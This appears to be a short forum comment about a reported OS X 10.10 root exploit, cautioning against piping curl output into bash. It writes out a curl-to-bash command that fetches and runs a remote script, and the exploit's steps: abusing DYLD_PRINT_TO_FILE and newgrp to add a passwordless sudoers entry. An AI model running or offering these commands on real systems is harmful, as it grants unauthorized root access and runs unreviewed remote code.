Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet
theregister.co.uk
theregister.co.uk
I think it was flagged because it used some social media tracking URL instead of the original...
Here's my post from that thread:
I like to think of this as a good example of why not to use curl to execute bash scripts.
curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bashapparently it
1. sets `DYLD_PRINT_TO_FILE=/etc/sudoers` on the env,
2. run `newgrp`
3. and pass in `'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'` as input to it.
everything seems innocuous and properly escaped as to not trigger anything bad...